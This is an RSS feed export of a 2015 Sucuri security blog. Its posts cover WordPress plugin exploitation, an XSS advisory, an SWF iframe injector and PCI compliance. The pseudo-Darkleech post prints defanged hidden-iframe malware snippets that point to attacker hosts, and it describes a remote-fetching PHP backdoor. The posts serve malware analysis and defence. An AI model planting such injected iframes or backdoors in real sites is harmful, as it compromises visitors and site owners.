<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Sucuri Blog</title>
	<atom:link href="http://blog.sucuri.net/feed" rel="self" type="application/rss+xml" />
	<link>http://blog.sucuri.net</link>
	<description>Protect Your Interwebs!</description>
	<lastBuildDate>Wed, 08 Apr 2015 05:40:37 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=4.1.1</generator>
	<item>
		<title>FBI Public Service Annoucement: Defacements Exploiting WordPress Vulnerabilities</title>
		<link>http://blog.sucuri.net/2015/04/fbi-public-service-annoucement-defacements-exploiting-wordpress-vulnerabilities.html</link>
		<comments>http://blog.sucuri.net/2015/04/fbi-public-service-annoucement-defacements-exploiting-wordpress-vulnerabilities.html#comments</comments>
		<pubDate>Wed, 08 Apr 2015 00:24:11 +0000</pubDate>
		<dc:creator><![CDATA[Daniel Cid]]></dc:creator>
				<category><![CDATA[Website Defacement]]></category>
		<category><![CDATA[WordPress Security]]></category>
		<category><![CDATA[wordpress]]></category>

		<guid isPermaLink="false">http://blog.sucuri.net/?p=12290</guid>
		<description><![CDATA[The US Federal Bureau of Investigation (FBI) just released a public service announcement (PSA) to the public about a large number of websites being exploited and compromised through WordPress plugin vulnerabilities: Continuous Web site defacements are being perpetrated by individuals sympathetic to the Islamic State in the Levant (ISIL) a.k.a. Islamic State of Iraq and<a class="more-link" href="http://blog.sucuri.net/2015/04/fbi-public-service-annoucement-defacements-exploiting-wordpress-vulnerabilities.html" rel="nofollow"><br /><strong>Read More</strong></a>]]></description>
				<content:encoded><![CDATA[<p><img src="http://blog.sucuri.net/wp-content/uploads/2015/04/FBI.jpg" alt="IMG_2802" width="780" height="520" class="aligncenter size-full wp-image-12300" /></p>
<p>The <a href="http://www.ic3.gov/media/2015/150407-1.aspx">US Federal Bureau of Investigation (FBI) just released</a> a public service announcement (PSA) to the public about a large number of websites being exploited and compromised through WordPress plugin vulnerabilities:</p>
<blockquote><p>
Continuous Web site defacements are being perpetrated by individuals sympathetic to the Islamic State in the Levant (ISIL) a.k.a. Islamic State of Iraq and al-Shams (ISIS). <b>The defacements have affected Web site operations and the communication platforms of news organizations, commercial entities, religious institutions, federal/state/local governments, foreign governments, and a variety of other domestic and international Web sites</b>. Although the defacements demonstrate low-level hacking sophistication, they are disruptive and often costly in terms of lost business revenue and expenditures on technical services to repair infected computer systems.
</p></blockquote>
<p>The FBI also goes into more detail and explain what happens when a site does get compromised:</p>
<blockquote><p>
Successful exploitation of the vulnerabilities could result in an attacker gaining unauthorized access, bypassing security restrictions, injecting scripts, and stealing cookies from computer systems or network servers. An attacker could install malicious software; manipulate data; or create new accounts with full user privileges for future Web site exploitation.
</p></blockquote>
<p>This is nothing new and we have been warning and educating our users over the years through our blog and other mediums. Political defacements are very common and one of the most used forms of online protest. And when a defacement is not practical, we see the same groups leveraging Distributed Denial of Service (DDoS) attacks to try to take the controversial content down.</p>
<h5>Plugins being Exploited</h5>
<p>The FBI disclosure doesn&#8217;t get into details on what is being exploited and what the attackers are doing. We have however had the opportunity to remediate and respond to many sites defaced by this group (and others); we will try to provide some clarity on these attacks.</p>
<p>First, the top 2 plugins currently being exploited are:</p>
<ul>
<li>Outdated RevSlider &#8211; Version < 4.2 - <a href="http://blog.sucuri.net/2014/09/slider-revolution-plugin-critical-vulnerability-being-exploited.html">Possible Source</a></li>
<li>Outdated GravityForms &#8211; Version < v1.8.20 - <a href="http://www.gravityhelp.com/gravity-forms-v1-8-20-released/">Possible Source</a></li>
</ul>
<p><em>The vulnerabilities being exploited appear to be from older versions of the plugins that have yet to be patched. We are not aware of any new vulnerabilities in either of the plugins.</em></p>
<p>Specially Revslider, which is the #1 by far compared to the others. After these first two, we are seeing many attack against FancyBox, Wp Symposium, Mailpoet and other popular plugins that had vulnerabilities disclosed recently. This list is not exhaustive at all, as it seems the attackers try to exploit whatever they can get their hands on, but it gives you an idea of what they are looking for. </p>
<p>Second, the FBI report also misses one very important point. It is not just vulnerability attempts against plugins, but we also see vulnerability on themes being misused, along with many brute force attacks targeted at WordPress administration panel. They are all used by these political defacements once they can get in.</p>
<p>Third, their recommendations to secure WordPress are missing many important points. They link to the WordPress hardening page that provides almost no real security to the end user. </p>
<p>It is not just about keeping it updated anymore. You have to have security in depth, you have to have monitoring, you have to leverage low-privileged users for most of your actions, you have to monitor your logs, you have to use good passwords, you have to audit the plugins and themes you are using. </p>
<p><i>*Note that the Revslider vulnerability was also used in the mass malware campaign called <a href="http://blog.sucuri.net/2014/12/revslider-vulnerability-leads-to-massive-wordpress-soaksoak-compromise.html">Soaksoak</a> back in December, and is still causing website owners issues today. </i></p>
<p>If you are looking for a comprehensive security solution for your WordPress websites, try our Website Firewall: <a href="https://sucuri.net/website-firewall">https://sucuri.net/website-firewall</a>. We call it a Firewall, but in reality, it is a cloud-based Intrusion Detection and Prevention system (IDS/IPS) for websites; one that can protect your site from the attacks described in this post and that the FBI is now warning us all about.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.sucuri.net/2015/04/fbi-public-service-annoucement-defacements-exploiting-wordpress-vulnerabilities.html/feed</wfw:commentRss>
		<slash:comments>14</slash:comments>
		</item>
		<item>
		<title>Security Advisory: Persistent XSS in WP-Super-Cache</title>
		<link>http://blog.sucuri.net/2015/04/security-advisory-persistent-xss-in-wp-super-cache.html</link>
		<comments>http://blog.sucuri.net/2015/04/security-advisory-persistent-xss-in-wp-super-cache.html#comments</comments>
		<pubDate>Tue, 07 Apr 2015 15:12:29 +0000</pubDate>
		<dc:creator><![CDATA[Marc-Alexandre Montpas]]></dc:creator>
				<category><![CDATA[Vulnerability Disclosure]]></category>
		<category><![CDATA[WordPress Security]]></category>

		<guid isPermaLink="false">http://blog.sucuri.net/?p=12283</guid>
		<description><![CDATA[Security Risk: Dangerous Exploitation level: Very Easy/Remote DREAD Score: 8/10 Vulnerability: Persistent XSS Patched Version:  1.4.4 During a routine audit for our Website Firewall (WAF), we discovered a dangerous Persistent XSS vulnerability affecting the very popular WP-Super-Cache plugin (more than a million active installs according to wordpress.org). The security issue, as well as another bug-fix<a class="more-link" href="http://blog.sucuri.net/2015/04/security-advisory-persistent-xss-in-wp-super-cache.html" rel="nofollow"><br /><strong>Read More</strong></a>]]></description>
				<content:encoded><![CDATA[<p><strong>Security Risk:</strong> Dangerous<br />
<strong>Exploitation level: </strong>Very Easy/Remote<br />
<strong>DREAD Score:</strong> 8/10<br />
<strong>Vulnerability:</strong> Persistent XSS<br />
<strong>Patched Version:  </strong><a href="https://wordpress.org/plugins/wp-super-cache/">1.4.4</a></p>
<p>During a routine audit for our Website Firewall (WAF), we discovered a dangerous Persistent XSS vulnerability affecting the very popular WP-Super-Cache plugin (more than a million active installs according to <a href="https://wordpress.org/plugins/wp-super-cache/">wordpress.org</a>). The security issue, as well as another bug-fix that was included in the issue&#8217;s original patch, are fixed in version 1.4.4.</p>
<h4>What are the risks?</h4>
<p>Using this vulnerability, an attacker using a carefully crafted query could insert malicious scripts to the plugin&#8217;s cached file listing page. As this page requires a valid nonce in order to be displayed, a successful exploitation would require the site&#8217;s administrator to have a look at that particular section, manually.</p>
<p>When executed, the injected scripts could be used to perform a lot of other things like adding a new administrator account to the site, injecting backdoors by using WordPress theme edition tools, etc.</p>
<h4>Technical details</h4>
<p>The issue lies in the way WP-Super-Cache would display information stored in cache file&#8217;s key, which is used by the plugin to decide what cache file must be loaded.</p>
<p><img src="http://blog.sucuri.net/wp-content/uploads/2015/04/WP-Super-Cache-Details-Key.png" alt="WP Super Cache Details Key" width="943" height="196" class="aligncenter size-full wp-image-12284" /></p>
<p>As you can see from the above, the <strong>$details[ &#8216;key&#8217; ]</strong> is directly appended to the page&#8217;s content, without being sanitized first (<strong>$details[ &#8216;uri&#8217; ]</strong> is sanitized somewhere else, before this snippet).</p>
<p><img src="http://blog.sucuri.net/wp-content/uploads/2015/04/WP-Super-Cache-Key-Index.png" alt="WP Super Cache Key Index" width="979" height="108" class="aligncenter size-full wp-image-12285" /></p>
<p>As the &#8216;key&#8217; index of the <strong>$details</strong> variable contains the <strong>get_wp_cache_key() </strong>function&#8217;s return (which contains data coming straight from the user&#8217;s cookies), an attacker can insert malicious scripts on the page.</p>
<h4>Update as soon as possible</h4>
<div>Again, if you’re using a vulnerable version of this plugin, update as soon as possible! In the event where you can not do this, we strongly recommend leveraging our <a href="http://sucuri.net/website-firewall/stop-website-attacks-and-hacks">Website Firewall</a> to get it patched virtually.</div>
]]></content:encoded>
			<wfw:commentRss>http://blog.sucuri.net/2015/04/security-advisory-persistent-xss-in-wp-super-cache.html/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Website Malware &#8211; The SWF iFrame Injector Evolves</title>
		<link>http://blog.sucuri.net/2015/04/website-malware-the-swf-iframe-injector-evolves.html</link>
		<comments>http://blog.sucuri.net/2015/04/website-malware-the-swf-iframe-injector-evolves.html#comments</comments>
		<pubDate>Thu, 02 Apr 2015 15:56:00 +0000</pubDate>
		<dc:creator><![CDATA[Peter Gramantik]]></dc:creator>
				<category><![CDATA[Joomla! Security]]></category>
		<category><![CDATA[Website Malware]]></category>
		<category><![CDATA[Website Security]]></category>
		<category><![CDATA[WordPress Security]]></category>
		<category><![CDATA[database]]></category>
		<category><![CDATA[flash]]></category>
		<category><![CDATA[iframe]]></category>
		<category><![CDATA[joomla]]></category>
		<category><![CDATA[SWF]]></category>
		<category><![CDATA[wordpress]]></category>

		<guid isPermaLink="false">http://blog.sucuri.net/?p=12248</guid>
		<description><![CDATA[Last year, we released a post about a malware injector found in an Adobe Flash (.SWF) file. In that post, we showed how a .SWF file is used to inject an invisible, malicious iFrame. It appears that the author of that Flash malware continued with this method of infection. Now we are seeing more varieties<a class="more-link" href="http://blog.sucuri.net/2015/04/website-malware-the-swf-iframe-injector-evolves.html" rel="nofollow"><br /><strong>Read More</strong></a>]]></description>
				<content:encoded><![CDATA[<p>Last year, we released a post about a <a href="http://blog.sucuri.net/2014/11/malicious-injector-in-swf-adobe-flash-file.html" title="Malicious iframe Injector Found in Adobe Flash File (.SWF)">malware injector found in an Adobe Flash (.SWF) file</a>. In that post, we showed how a .SWF file is used to inject an invisible, malicious iFrame.</p>
<p>It appears that the author of that Flash malware continued with this method of infection. Now we are seeing more varieties infecting both WordPress and Joomla websites. Though it&#8217;s uncertain how many iterations existed in the wild when we first reported the issue, this time we’ve found a lot of websites where the infection looks similar:</p>
<pre>infected-site-name.com/<strong><em>images/banners/kxc.swf?myid=1d57987c38051fdc93ea7393b448003e</em></strong></pre>
<h5>Identifying the Flash Infection</h5>
<p>The similarities are easy to spot once you know what they are. The malicious .SWF file is always stored in <strong>/images/banners/</strong> and the file name is three random characters followed by .SWF with an ID parameter appended:</p>
<pre><strong><em>xyz.swf?myid=1d57987c38051fdc93ea7393b448003e</em></strong></pre>
<p>So, how does the infection look this time around? Here is the Flash file decompiled:</p>
<div id="attachment_12251" style="width: 810px" class="wp-caption aligncenter"><a href="http://blog.sucuri.net/wp-content/uploads/2015/04/swf1.png" rel="lightbox"><img src="http://blog.sucuri.net/wp-content/uploads/2015/04/swf1.png" alt="Malicious SWF Infection" class="size-full wp-image-12251" /></a><p class="wp-caption-text">Malicious code has similarities to the infection reported in November</p></div>
<h5>The Same Hacker at Work</h5>
<p>Apparently, the malware author is the same. Variable names, coding logic, and UserAgent condition are all indicators of this. However, the source website delivering the malicious payload is different. Also, while there were mostly Joomla based websites affected previously, we’re also seeing WordPress sites with this infection.</p>
<p><a href="http://blog.sucuri.net/author/benmartin" title="Ben Martin - Sucuri Security Analyst" target="_blank">Ben Martin</a>, a member of our Remediation Team, found infected Flash objects matching our description that were injected inside a WordPress database:</p>
<div id="attachment_12250" style="width: 810px" class="wp-caption aligncenter"><a href="http://blog.sucuri.net/wp-content/uploads/2015/04/swf2.png" rel="lightbox"><img src="http://blog.sucuri.net/wp-content/uploads/2015/04/swf2.png" alt="SWF infected the WP database" class="size-full wp-image-12250" /></a><p class="wp-caption-text">Similar infected .SWF found in the WordPress database</p></div>
<h5>The Impact Five Months Makes</h5>
<p>This time, many more sites are being affected — several hundred, maybe more. </p>
<p>Another difference is that at the time of my <a href="http://blog.sucuri.net/2014/11/malicious-injector-in-swf-adobe-flash-file.html" title="Malicious iframe Injector Found in Adobe Flash File (.SWF)" target="_blank">original post on this infection</a>, no AntiVirus company detected this threat. This time, about half of vendors are detecting the issue:</p>
<div id="attachment_12249" style="width: 981px" class="wp-caption aligncenter"><a href="http://blog.sucuri.net/wp-content/uploads/2015/04/swf3.png" rel="lightbox"><img src="http://blog.sucuri.net/wp-content/uploads/2015/04/swf3.png" alt="VirusTotal Results show 23/57 vendors detect the malware" width="971" height="848" class="size-full wp-image-12249" /></a><p class="wp-caption-text">VirusTotal: 23/57 vendors detect malicious content</p></div>
<p>Malware evolves every day, and I’m sure we’ll see more variations of this particular strain in the future. You can be sure that we will share our findings with you every time. In the interim, if you find yourself troubled with something similar be sure to<a href="http://sucuri.net/website-antivirus/malware-removal"> look for professional help</a> and get back to business. </p>
<p>Stay safe and keep your eyes open!</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.sucuri.net/2015/04/website-malware-the-swf-iframe-injector-evolves.html/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Intro to E-Commerce and PCI Compliance &#8211; Part I</title>
		<link>http://blog.sucuri.net/2015/03/intro-to-e-commerce-and-pci-compliance-part-i.html</link>
		<comments>http://blog.sucuri.net/2015/03/intro-to-e-commerce-and-pci-compliance-part-i.html#comments</comments>
		<pubDate>Tue, 31 Mar 2015 21:14:15 +0000</pubDate>
		<dc:creator><![CDATA[Daniel Cid]]></dc:creator>
				<category><![CDATA[Ecommerce Security]]></category>
		<category><![CDATA[PCI DSS]]></category>
		<category><![CDATA[Website Security]]></category>
		<category><![CDATA[pci]]></category>
		<category><![CDATA[pci-dss]]></category>

		<guid isPermaLink="false">http://blog.sucuri.net/?p=12230</guid>
		<description><![CDATA[Have you ever heard of the term PCI? Specifically, PCI compliance? If you have an e-commerce website, you probably have already heard about it. But do you really understand what it means for you and your online business? In this series, we will try to explain the PCI standard and how it affects you and<a class="more-link" href="http://blog.sucuri.net/2015/03/intro-to-e-commerce-and-pci-compliance-part-i.html" rel="nofollow"><br /><strong>Read More</strong></a>]]></description>
				<content:encoded><![CDATA[<p><img src="http://blog.sucuri.net/wp-content/uploads/2015/03/Sucuri-ecommerce-PCI-compliance.png" alt="Sucuri-ecommerce-PCI-compliance" width="780" height="350" class="aligncenter size-full wp-image-12244" /></a></p>
<p>Have you ever heard of the term PCI? Specifically, PCI compliance? If you have an e-commerce website, you probably have already heard about it. But do you really understand what it means for you and your online business? In this series, we will try to explain the PCI standard and how it affects you and your website.</p>
<p>We will focus mostly on small and medium size e-commerce based solutions, which is the category that most of our clients fall into.</p>
<p>Part I &#8211; Introduction to E-Commerce and PCI Compliance<br />
<i>Part II &#8211; PCI and E-Commerce cloud-based SMB&#8217;s (coming soon)</i><br />
<i>Part III &#8211; PCI and your WordPress-based e-commerce (coming soon)</i><br />
<i>Part IV &#8211; PCI requirements in detail for cloud-based servers &#8211; Open source can help</i></p>
<h5>What is PCI?</h5>
<p>PCI is not a law or a government regulation. The right name is actually <b>PCI DSS</b>, which means <i>Payment Card Industry &#8211; Data Security Standard</i>. So PCI is a standard that contains a series of security requirements that every merchant, big or small, must follow, to be in compliance. </p>
<p>PCI was created and is mandated by the five major credit card companies: Visa, MasterCard, American Express, Discover, and JCB. The PCI council now administers and keeps it updated.</p>
<p>Every merchant falls under PCI, even if you do not handle a large volume of transactions or use external providers to outsource your credit card information. </p>
<p>For those merchants that outsource their payment process, the scope of PCI is smaller and the verification requirements are lower and can likely be achieved by completing the <a href="https://www.pcisecuritystandards.org/merchants/self_assessment_form.php">PCI Data Security Standard (DSS) Self Assessment Questionnaire (SAQ)</a>. However, they must still follow the requirements.</p>
<h5>PCI and Small Businesses</h5>
<p>Many of our clients think that PCI does not apply to them because they are small. This is a very common mis-conception. PCI applies to any business that processes, stores or transmits credit card data. I will quote the PCI website section for SMB&#8217;s to explain how seriously they take it:</p>
<blockquote><p>
<b>Small Merchants</b> &#8211; You must secure cardholder data to meet Payment Card Industry rules!</p>
<p>Small merchants are prime targets for data thieves. It’s your job to protect cardholder data at the point-of-sale.</p>
<p>If cardholder data is stolen – and it’s your fault – you could incur fines, penalties, even termination of the right to accept payment cards!
</p></blockquote>
<p>If you are not taking security seriously and you do get hacked and your customers information is stolen, you will face serious repercussions.</p>
<h5>Why should you care about PCI?</h5>
<p>PCI compliance is mandatory if you accept credit card payments. You can&#8217;t run away from it. If you do not follow their requirements, you may face penalties, fines and even be prohibited from accepting credit cards in the future.</p>
<p>But that&#8217;s not the real reason why you should care about PCI. The real reason is that PCI gives you a number of very good recommendations to secure your online business. They will minimize the risk of your site getting compromised and having information stolen. I assure you that your customers will be very grateful not to have their information stolen from your website.</p>
<p>The fines for not complying with PCI can be harsh, but won&#8217;t be worse than the brand impact and the lost of trust from your clients by not taking security seriously.</p>
<h5>PCI requirements</h5>
<p>Now that you know what PCI is and what you should care about, let&#8217;s look at what it entails. </p>
<p>It is divided into 6 major categories, 12 requirements:</p>
<p><b>Build and Maintain a secure network</b><br />
Requirement 1- Install and maintain a firewall.</p>
<p>Requirement 2- Do not use vendor-supplied defaults for system passwords or other security parameters.</p>
<p><b>Protect Cardholder data</b><br />
Requirement 3- Protect stored cardholder data.</p>
<p>Requirement 4- Encrypt transmission or cardholder data across public networks.</p>
<p><b>Maintain a vulnerability management program</b><br />
Requirement 5- Protect all systems against malware and regularly update anti-virus programs.</p>
<p>Requirement 6- Develop and maintain secure systems and applications.</p>
<p><b>Implement Strong Access Control Measures</b><br />
Requirement 7- Restrict access to card holder data by business need-to know.</p>
<p>Requirement 8- Identify and authenticate access to system components.</p>
<p>Requirement 9- Restrict physical access to card holder data.</p>
<p><b>Regularly Test and Monitor Networks</b><br />
Requirement 10- Track and monitor all access to network resources and card holder data.</p>
<p>Requirement 11- Regularly test security systems and processes.</p>
<p><b>Maintain an Information Security Policy</b><br />
Requirement 12- Maintain an information security policy.</p>
<p>These 12 requirements cover different business areas that break down into more than 200 sub-requirements.</p>
<p>Each sub requirement is a check box in the self-assessment questionnaire that you will have to to follow. They can be very simple, an example being 6.2 that requires that &#8220;all system components and software are protected from known vulnerabilities by installing patches&#8221; to some more complex requirements like 10.2 that requires &#8220;automated audit trails implemented on all system components&#8221;.</p>
<h5>PCI and e-commerce sites</h5>
<p>In the next article of this series, we will talk about PCI and E-Commerce-only businesses. What do you have to do if you have a small business that is all online? What if you do not have a real network and your site is in the cloud? What if your business is only you?</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.sucuri.net/2015/03/intro-to-e-commerce-and-pci-compliance-part-i.html/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>WordPress Malware Causes Psuedo-Darkleech Infection</title>
		<link>http://blog.sucuri.net/2015/03/pseudo-darkleech-server-root-infection.html</link>
		<comments>http://blog.sucuri.net/2015/03/pseudo-darkleech-server-root-infection.html#comments</comments>
		<pubDate>Thu, 26 Mar 2015 09:00:37 +0000</pubDate>
		<dc:creator><![CDATA[Denis Sinegubko]]></dc:creator>
				<category><![CDATA[Joomla! Security]]></category>
		<category><![CDATA[Webserver Infections]]></category>
		<category><![CDATA[Website Malware]]></category>
		<category><![CDATA[Website Security]]></category>
		<category><![CDATA[WordPress Security]]></category>
		<category><![CDATA[Conditional Malware]]></category>
		<category><![CDATA[darkleech]]></category>
		<category><![CDATA[geo-targeting]]></category>
		<category><![CDATA[iis]]></category>
		<category><![CDATA[user-agent]]></category>

		<guid isPermaLink="false">http://blog.sucuri.net/?p=12209</guid>
		<description><![CDATA[Darkleech is a nasty malware infection that infects web servers at the root level. It use malicious Apache modules to add hidden iFrames to certain responses. It&#8217;s difficult to detect because the malware is only active when both server and site admins are not logged in, and the iFrame is only injected once a day<a class="more-link" href="http://blog.sucuri.net/2015/03/pseudo-darkleech-server-root-infection.html" rel="nofollow"><br /><strong>Read More</strong></a>]]></description>
				<content:encoded><![CDATA[<div id="attachment_12216" style="width: 810px" class="wp-caption aligncenter"><a href="http://blog.sucuri.net/wp-content/uploads/2015/03/darkleech-servers.jpg" rel="lightbox"><img src="http://blog.sucuri.net/wp-content/uploads/2015/03/darkleech-servers.jpg" alt="Source: The National Archives (UK)" width="800" height="467" class="size-full wp-image-12216" /></a><p class="wp-caption-text">Source: The National Archives (UK)</p></div>
<p><a href="http://blog.sucuri.net/2014/02/darkleech-bitly-com-insightful-statistics.html" title="Darkleech + Bitly.com = Insightful Statistics" target="_blank">Darkleech</a> is a nasty malware infection that infects web servers at the root level. It use malicious Apache modules to add hidden iFrames to certain responses. It&#8217;s difficult to detect because the malware is only active when both server and site admins are not logged in, and the iFrame is only injected once a day (or once a week in some versions) per IP address. This means that the infection symptoms are not easy to reproduce. Since it’s a server-level infection, even the most thorough website-level scans won’t reveal anything. And even when the culprit is identified, website owners may not be able to resolve the issue without help of a server administrator.</p>
<p>Despite the detection difficulties, it was quite easy to tell that the server was infected with Darkleech when we saw the malicious code — it has followed the same recognizable pattern since 2012: </p>
<ul>
<li>Declaration of a CSS class with a random name and random negative absolute position</li>
<li>A div of that class</li>
<li>A malicious iFrame with random dimensions inside that div.</li>
</ul>
<p>This is what it looked like back in September of 2012:</p>
<pre>&lt;style&gt;.<strong>tlqvepxi</strong> { position:absolute; left:-<strong>1648</strong>px; top:<strong>-1752</strong>px} &lt;/style&gt; &lt;div class="<strong>tlqvepxi</strong>"&gt;<br />
&lt;iframe src="hxxp://<em>example.com</em>/21234443.html" width="<strong>581</strong>" height="<strong>476</strong>"&gt;&lt;/iframe&gt;&lt;/div&gt;</pre>
<p>and this is the code from <a href="http://blog.unmaskparasites.com/2014/11/27/darkleech-update-november-2014/" target="_blank">November of 2014</a></p>
<pre>&lt;style&gt;.<strong>syxq9la69</strong> { position:absolute; left:<strong>-1666</strong>px; top:<strong>-1634</strong>px} &lt;/style&gt; &lt;div class="<strong>syxq9la69</strong>"&gt;<br />
&lt;iframe src="hxxp://<strong>jsnrgo .ddns .net</strong>/nsiumkogckv1tv4locfzyv2eykqss9ltfb9wnmhfqz1ol2" width="<strong>285</strong>" height="<strong>554</strong>"&gt;&lt;/iframe&gt;&lt;/div&gt;</pre>
<p>Very similar, isn’t it?</p>
<p>At some point, Darkleech began to use free <a href="http://www.noip.com/remote-access" title="NoIP.com DarkLeech" target="_blank">No-IP</a> dynamic DNS hostnames (random third-level domains on <em>ddnes.net</em>, <em>myftp.org</em>, <em>servepics.com</em>, <em>hopto.org</em>, <em>serveftp.com</em>, etc. ) and this became one of its distinguishing features too.</p>
<h3>New version of Darkleech?</h3>
<p>Recently, we began to notice the following code on some WordPress websites.</p>
<pre>&lt;style&gt;.<strong>cznfvc1d54</strong> { position:absolute; left:<strong>-1447</strong>px; top:<strong>-1785</strong>px} &lt;/style&gt; &lt;div class="<strong>cznfvc1d54</strong>"&gt;<br />
&lt;iframe src="hxxp:// dhbxnx .serveftp .com/<strong>blog/4c2H?utm_source=g86</strong>" width="<strong>593</strong>" height="<strong>405</strong>"&gt;&lt;/iframe&gt;&lt;/div&gt;</pre>
<p>That’s the same pattern, except for the trailing iFrame URL part: <strong>/blog/4C2H?utm_source=g86</strong>.</p>
<p>It stayed the same on all the sites. The only varying part of the URL paths was the value of the <strong>utm_source</strong> parameter: <em>utm_source=<strong>g86</strong></em>, <em>utm_source=<strong>g112</strong></em>, <em>utm_source=<strong>g90</strong></em>,<em> utm_source=<strong>g98</strong></em>, etc.</p>
<p>Sometimes the malware was hard to reproduce, but on some sites it was reproducible on every load. What was even stranger is that we saw this on <strong>IIS</strong> servers (with PHP support) too. We had not heard of Darkleech infecting IIS web servers.</p>
<h5>Malware in nav-menu.php</h5>
<p>Then we had a chance to work with one of the infected websites and found the real source of these “Darkleech iFrames”. The culprit was the infected <strong>wp-includes/nav-menu.php</strong> core WordPress file.</p>
<p>It had the following injected encrypted code in the middle of it:</p>
<div id="attachment_12210" style="width: 608px" class="wp-caption aligncenter"><a href="http://blog.sucuri.net/wp-content/uploads/2015/03/malware-nav-menu-php.gif" rel="lightbox"><img src="http://blog.sucuri.net/wp-content/uploads/2015/03/malware-nav-menu-php.gif" alt="Malware in nav-menu.php" width="598" height="503" class="size-full wp-image-12210" /></a><p class="wp-caption-text">Malware in nav-menu.php</p></div>
<p>In this decoded version, we see a backdoor section that allows execution of PHP code passed in the <strong>p1</strong> and <strong>p2</strong> POST parameters to any blog URL:</p>
<p><a href="http://blog.sucuri.net/wp-content/uploads/2015/03/backdoor_section.gif" rel="lightbox"><img src="http://blog.sucuri.net/wp-content/uploads/2015/03/backdoor_section.gif" alt="Backdoor section of the code" width="468" height="202" class="aligncenter size-full wp-image-12211" /></a></p>
<p>&#8230; and this section that downloads code from a remote<strong> dazzer .slyip .com</strong> server and injects the downloaded code into web pages:</p>
<div id="attachment_12212" style="width: 558px" class="wp-caption aligncenter"><a href="http://blog.sucuri.net/wp-content/uploads/2015/03/dazzer_slyip_com.gif" rel="lightbox"><img src="http://blog.sucuri.net/wp-content/uploads/2015/03/dazzer_slyip_com.gif" alt="Downloading malware from dazzer .slyip .com" width="548" height="351" class="size-full wp-image-12212" /></a><p class="wp-caption-text">Downloading malware from dazzer .slyip .com</p></div>
<h4>Two Layers of Tests</h4>
<p>Here you can see that there are two layers of tests determining whether to inject malware or not.</p>
<p>The first layer is in this script. It’s some sort of pre-screening. It makes sure that the requests are not coming from search engine bots or from Google’s network. Also note the commented out line where they used to check for Internet Explorer browsers only — for some reason they removed this condition in the current version.</p>
<p>The second layer is on the remote server. They pass the following information about every request in the parameters of the URL: <strong>hxxp: / /dazzer .slyip .com/ordpm/v2/?export=7f53f8c6c730af6aeb52e66eb74d8507&amp;url=nnnnn&amp;g=ggg </strong>:</p>
<ul>
<li>    Domain of the infected site</li>
<li>    IP address of the visitor</li>
<li>    Browser of the visitor (user agent)</li>
<li>    Referrer</li>
</ul>
<p>It’s clear that this information is used to determine request “eligibility”. The <strong>dazzer .slyip .com</strong> can track IP addresses and return the malicious code only <strong>once in a certain period of time</strong>, to requests <strong>from the same IP.</strong> The IP address also helps with geo-targeting if the attackers are only interested in traffic from certain countries. The user agent string will tell them whether the visitor uses a vulnerable version of a browser that they can attack. The referrer helps them identify visitors who came to the site after clicking on links in search results or on social networks (website owners and webmasters are more likely to use bookmarks rather than search engines).</p>
<p>If all the requirements are met, the remote server returns a base64-encoded malware to be injected into web pages (since it is in the <strong>nav-menu.php</strong> it will be at the very top of the HTML code, before the  tag). If the request is considered not eligible, then <strong>dazzer .slyip .com </strong>doesn’t return anything and malware is not being injected.</p>
<h4>Verifying the Injected Payload<br />
<h4>
<p>OK, this code is definitely malicious and its behavior is quite typical for PHP malware. But is it really responsible for those “Darkleech iFrames” &#8211; or maybe it’s some different malware and removing it won’t be enough to fix the Darkleech problem. To figure this out, I conducted a very simple test — used the malware code to prepare a complete <strong>dazzer .slyip .com</strong> URL with all the required parameters and made a request to it from a different server — the response came back with a base64-encoded string, which after decoding looked like this:</p>
<div id="attachment_12213" style="width: 558px" class="wp-caption aligncenter"><a href="http://blog.sucuri.net/wp-content/uploads/2015/03/dazzer_slyip_com1.gif" rel="lightbox"><img src="http://blog.sucuri.net/wp-content/uploads/2015/03/dazzer_slyip_com1.gif" alt="Pseudo-darkleech code from dazzer .slyip .com" width="548" height="351" class="size-full wp-image-12213" /></a><p class="wp-caption-text">Pseudo-darkleech code from dazzer .slyip .com</p></div>
<p>That’s exactly the code that we originally thought belonged to Darkleech. And you might have noticed that the <strong>utm_source=g112</strong> parameter in the iframe URL matches the <strong>g=112</strong> parameter in the d<strong>azzer .slyip .com</strong> URL. This test proved that the real culprit was the malware inside one of the WordPress files, not a root level web server infection.</p>
<p>What we see here is malware that uses the same iframe code generation algorithm as we originally noticed in Darkleech: hidden style, div and an iframe inside the hidden dive, with all the names and parameters changing on every load. The use of <a href="http://www.noip.com/remote-access" target="_blank">No-IP</a> hostnames is also common with Darkleech. By the way, the <strong>dazzer .slyip .com</strong> domain also uses a Dynamic DNS service — this time if belongs to <a href="https://www.dtdns.com/dtsite/infodynamichosts" target="_blank">DtDNS</a> (at the time of writing it points to <strong>217.172.170.7</strong> – Germany, Hurth Plusserver Ag).</p>
<h3>Remediation</h3>
<p>Unlike a real Darkleech infection, this one is pretty easy to deal with. The malware should be detectable by any security plugin (e.g. <a href="https://wordpress.org/plugins/sucuri-scanner/">Sucuri Security plugin</a>) that checks integrity of core WP files. And the easiest way to remove the malware is to replace the infected file with the clean one from the original WordPress package. You can also reinstall WordPress or upgrade it if you are still using an old version.</p>
<p><span style="line-height: 1.5;">Of course, this is only a part of the cleanup process. You will also need to find and remove all the backdoors that hackers might have placed on your server and identify the security hole that was used to break into your site in the first place. </span></p>
